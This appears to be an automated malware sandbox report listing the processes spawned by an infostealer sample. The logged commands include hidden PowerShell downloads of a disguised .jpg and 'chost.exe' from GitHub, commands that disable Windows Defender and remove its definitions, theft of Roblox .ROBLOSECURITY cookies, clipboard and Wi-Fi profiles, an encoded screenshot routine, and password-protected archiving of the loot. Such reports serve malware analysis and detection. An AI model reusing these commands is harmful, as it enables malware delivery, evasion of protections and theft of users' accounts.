                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/poh21/releases/download/hu23/chost.exe/' -outfile chost.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\calc.exe calc.exeJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Users\user\AppData\Local\Temp\chost.exe chost.exeJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI43362\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\JFeXQ.zip" *"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The application cannot open the file due to an unknown error. Please try again.', 0, 'Cannot Open File', 48+16);close()"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
